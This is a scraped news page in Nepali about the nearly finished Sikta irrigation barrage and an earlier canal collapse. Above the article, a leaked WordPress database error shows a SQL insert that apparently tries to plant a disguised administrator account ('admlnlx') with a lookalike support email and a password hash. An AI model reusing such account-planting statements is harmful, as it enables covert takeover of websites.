WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMi.yHcjWn8mqr0aMee/eib5eAM1h3/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 15:10:07', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, पुस ७ –
राष्ट्रिय गौरवको आयोजना सिक्टा सिँचाइको ब्यारेज निर्माणको काम करिब सकिएको छ । अहिलेसम्म ९९.९ प्रतिशत काम सम्पन्न भएको आयोजनाले जनाएको छ ।
ब्यारेजको काम पनि पूर्णरुपले सकिएकाले अब फिनिसिङको काम मात्र बाँकी रहेको बताइएको छ । आगामी जेठ १५ देखि असार १५ सम्ममा जेठीनालासम्म सिँचाई पु¥याउने तयारी भइरहेको सिक्टा सिँचाइ आयोजनाका प्रमुख रमेश बस्नेतले जानकारी दिनुभयो ।
यसअघि परीक्षणका क्रममा नहर भत्किएपछि धेरैले आयोजनामाथि शङ्का गरेका थिए । ठूलाठूला आयोजनामा काम गरेको अनुभवका आधारमा यस्ता त्रुटि देखिनु सामान्य भएको उहाँले बताउनुभयो । पानी बिस्तारै छोड्नुपर्नेमा एक्कासि प्रतिसेकेन्ड २५ हजार लिटर पानी छोडेकाले यो समस्या देखिएको उहाँले बताउनुभयो ।
राष्ट्रिय गौरवको आयोजनामा बजेटको कहिल्यै कमी नहुने बताउँदै उहाँले भन्नुभयो, “बजेटको कमीले काममा यस्ता समस्या देखिएको भन्ने प्राविधिकबाट आएको भनाइ गलत हो ।” उहाँका अनुसार सिक्टा सिँचाई आयोजनाको अहिले जेठीनालासम्मको ३५ किलोमिटरदेखि ४५.२५० किलोमिटरसम्म निर्माण भइरहेको छ ।